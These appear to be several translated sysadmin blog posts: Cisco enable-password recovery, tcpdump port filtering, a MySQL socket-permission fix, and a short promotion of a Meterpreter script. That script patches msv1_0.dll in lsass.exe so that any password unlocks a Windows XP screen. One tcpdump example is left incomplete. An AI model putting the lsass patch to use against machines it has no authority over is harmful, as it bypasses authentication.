The first thing we need to do is to stop the IOS (the operating system) from loading while the router boots. To do this, press CTRL+BREAK (CTRL+C) during startup. This boots the device into the limited operating system called the mini IOS, in which only a restricted set of operations can be performed. Now we change the configuration register with the o/r 0x2142 command typed at the command line. From now on, our router will not load the configuration from NVRAM at startup. Let's power the router off and on. Because our old working configuration could not be loaded, IOS now asks whether we want to build a new configuration step by step. After answering No to this question, our default command prompt, router>, appears.

After typing it and pressing Enter, we are in enable mode without a password. So what happens to our old configuration?

Our old configuration is still stored in NVRAM. Right now we are in the Running-Config. What we need to do to get our old configuration back is very simple: we copy the configuration in Startup-Config over the Running-Config. The following command is all it takes.

router#copy startup-config running-config

Good, we have recovered the old configuration. Now let's set a new enable secret password. For this we need to enter global configuration mode.

router#configure terminal

This command takes us into global configuration mode.

router(config)#enable secret <your-password>

With this command you can set your new enable secret password. After this step we need to go back to enable mode and save the configuration running in RAM to NVRAM, so that when the router is powered off and on it comes up with the settings we made.

router#copy running-config startup-config

With the step above the copy is complete. We have both recovered the old configuration and renewed our enable secret password. One last step remains: returning the Configuration Register to its original value. For this it is enough to enter global configuration mode again and type the line below.

router#configure terminal
router(config)#config-register 0x2102

After this last step, if we power the router off and on, we can carry on working with the new enable secret password and our old configuration.

Good luck to you all,

Watching traffic other than ssh and https with tcpdump

Hello. Many people who work with networks have used tcpdump to monitor their network, but sometimes the encrypted traffic on our network (ssh, https) needlessly takes up space in tcpdump and creates noise in the output. This is where tcpdump's extra parameters let us watch traffic other than ssh and https.

tcpdump -i venet0:0 port not 22

lets us watch traffic other than port 22. Furthermore,

tcpdump -i venet0:0 port not 22 and port not 53

lets us exclude several ports from monitoring.

tcpdump -i venet0:0 port not 22 and host

lets us add a host address as well.
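As an added example (not from the original post), a small shell wrapper that builds the same kind of exclusion filter, checks that every excluded port is numeric so a typo cannot silently change what gets captured, and hands the result to tcpdump. The interface name venet0:0 comes from the post; the excluded ports 22 and 443 and the sample host 10.0.0.5 are assumptions.

```shell
# Added example: compose a tcpdump filter that drops encrypted/noisy ports.
# quiet_filter "22 443" [HOST]  -> "port not 22 and port not 443 [and host HOST]"
quiet_filter() {
    ports=$1
    host=$2
    filter=""
    for p in $ports; do
        # Accept only plain port numbers; anything else aborts the build.
        case $p in
            ''|*[!0-9]*) echo "bad port: $p" >&2; return 1 ;;
        esac
        if [ -z "$filter" ]; then
            filter="port not $p"
        else
            filter="$filter and port not $p"
        fi
    done
    # Optional host restriction, as in the post's third command.
    if [ -n "$host" ]; then
        if [ -z "$filter" ]; then
            filter="host $host"
        else
            filter="$filter and host $host"
        fi
    fi
    printf '%s\n' "$filter"
}

# Run tcpdump on the post's interface (assumed name) without ssh/https.
# -nn skips name and port lookups, which would otherwise add noise and delay.
quiet_capture() {
    iface=${1:-venet0:0}
    f=$(quiet_filter "22 443" "$2") || return 1
    tcpdump -nn -i "$iface" "$f"
}
```

Call quiet_capture venet0:0 10.0.0.5 to capture everything to or from that host except ssh and https.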

Can’t start server : Bind on unix socket: Permission denied

Recently, on a Linux server I was working on, I kept getting error logs about mysql failing to start. The error I got was:
[ERROR] Can’t start server : Bind on unix socket: Permission denied 
[ERROR] Do you already have another mysqld server running on socket: /var/lib/mysql/mysql.sock ? 
[ERROR] Aborting

There was also an error like the following:

Can’t connect to local MySQL server through socket ‘/var/lib/mysql/mysql.sock’ (2)

As the logs show, the problem is with the permission settings of the mysql.sock file. The fix is as follows:
1. First, let's make sure the socket file is deleted.
rm /var/lib/mysql/mysql.sock
2. Stop the MySQL processes; you can do this with the command below.
killall -e -9 mysql
3. Make sure the user and group of the mysql folder under /var/lib are mysql and root. We do this with the command below while in /var/lib.
chown mysql:root mysql
4. Start the MySQL service again.
service mysql start
MySQL's files can sometimes live under different folders, so make sure which folder it is running from. You can find it with
locate mysql

Screen Unlock Meterpreter Script

In this video, we look at a demo of the screen unlock meterpreter script. The script needs SYSTEM privileges and patches the msv1_0.dll loaded by lsass.exe so that every password will be accepted to unlock the screen. (the patch can also be undone to get back to normal behavior). Currently Windows XP SP2 and SP3 are supported. You can download it from here. The script author’s blog has more details. Thanks go out to PaulDotCom for uploading this to vimeo.